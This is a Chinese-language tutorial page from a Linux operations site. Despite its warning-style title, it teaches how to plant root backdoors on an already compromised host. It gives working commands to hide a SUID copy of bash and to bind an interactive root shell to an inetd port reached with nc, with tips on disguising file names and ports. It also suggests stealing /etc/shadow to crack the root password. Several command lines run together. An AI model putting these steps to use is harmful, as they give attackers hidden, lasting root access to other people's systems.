Centos系统下载大全 | Redhat系统下载大全 | Windows2012系统下载大全 | Windows2008系统下载大全| CMS教程 | 网站地图 51运维网-专注Linux/Unix系统安全运维!
当前位置:51运维网 > 教程 > Linux教程 > 正文

CentOS小心被suid shell与inetd后门利用

时间:2016-07-09 19:06 来源:网络整理 作者:linux系统 阅读:

 

CentOS小心suid shellinetd后门利用

 

 

你现在已经是root用户, 想留一个后门。

 

Linux后门的两种姿势:suid shell与inetd后门

 

  系统环境:

  dawg:~# uname -a

  Linux dawg 2.4.20-1-386 #3 Sat Mar 22 12:11:40 EST 2003 i686 GNU/Linux

1. SUID shell

  首先, 先切换成为root用户,并执行以下的命令:

  dawg:~# cp /bin/bash /.wootdawg:~# chmod 4755 /.wootdawg:~# ls -al /.woot-rwsr-xr-x 1 root root 690668 Jul 24 17:14 /.woot

  当然, 你也可以起其他更具备隐藏性的名字,我想猥琐并机智的你,肯定能想出很多好的名字的。文件前面的那一点也不是必要的,只是为了隐藏文件( 在文件名的最前面加上“.”,就可以在任意文件目录下进行隐藏) .

  现在,做为一个普通用户,我们来启用这个后门:

  fw@dawg:~$ iduid=1000(fw) gid=1000(fw) groups=1000(fw)fw@dawg:~$ /.woot.woot-2.05b$ iduid=1000(fw) gid=1000(fw) groups=1000(fw).woot-2.05b$

  为什么不行呢?

  因为 bash2 针对 suid有一些护卫的措施. 但这也不是不可破的:

  .woot-2.05b$ /.woot -p

  .woot-2.05b# id

  uid=1000(fw) gid=1000(fw) euid=0(root) groups=1000(fw)

  使用-p参数来获取一个root shell. 这个euid的意思是 effective user id(关于这些ID的知识,可以戳这里)

  这里要特别注意的是,作为一个普通用户执行这个SUID shell时,一定要使用全路径。

  小知识:

  如何查找那些具有SUID 的文件:

  dawg:~# find / -perm +4000 -ls

  这时就会返回具有SUID位的文件啦。

2. 远程后门:利用 /etc/inetd.conf

  我们使用vi来修改 /etc/inetd.conf 文件

  原文件:

  #chargen dgram udp wait root internal

  #discard stream tcp nowait root internal

  #discard dgram udp wait root internal

  #daytime stream tcp nowait root internal

  修改为:

  #discard stream tcp nowait root internal

  #discard dgram udp wait root internal

  daytime stream tcp nowait root /bin/bash bash -i

  开启inetd:

  dawg:~# inetd

  如果要强制重启inetd:

  dawg:~# ps -ef | grep inetdroot 362 1 0 Jul22 ? 00:00:00 /usr/sbin/inetdroot 13769 13643 0 17:51 pts/1 00:00:00 grep inetddawg:~# kill -HUP 362

  现在我们就可以用nc来爆菊了:

  C:tools 192.168.1.77: inverse host lookup failed: h_errno 11004: NO_DATA

   (UNKNOWN) [192.168.1.77] 13 (daytime) open

   bash: no job control in this shell

   bash-2.05b# bash-2.05b#

   bash-2.05b# iduid=0(root)

   gid=0(root) groups=0(root)bash-2.05b# uname -a

   Linux dawg 2.4.20-1-386 #3 Sat Mar 22 12:11:40 EST 2003 i686 GNU/Linux

小贴士:

  我们可以修改/etc/services文件,加入以下的东西:

  woot 6666/tcp #evil backdoor service

  然后修改/etc/inetd.conf :

  woot stream tcp nowait root /bin/bash bash -i

  我们可以修改成一些常见的端口,以实现隐藏。

小编感言: 其实下 /etc/shadow文件,爆破root的密码才最保险啊!

 

 


 

 

感谢您对【51运维网 http://www.51ou.com/】的支持,我们为您免费提供《CentOS小心被suid shell与inetd后门利用》技术文章,《CentOS小心被suid shell与inetd后门利用》详细使用和说明,有时《CentOS小心被suid shell与inetd后门利用》可能不完善、敬请谅解!如果《CentOS小心被suid shell与inetd后门利用》有错误请给我们留言,我们将尽快修复文章错误,如果您觉得本站不错,请分享给周围的朋友!谢谢!

顶一下
(0)
0%
踩一下
(0)
0%
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
验证码:点击我更换图片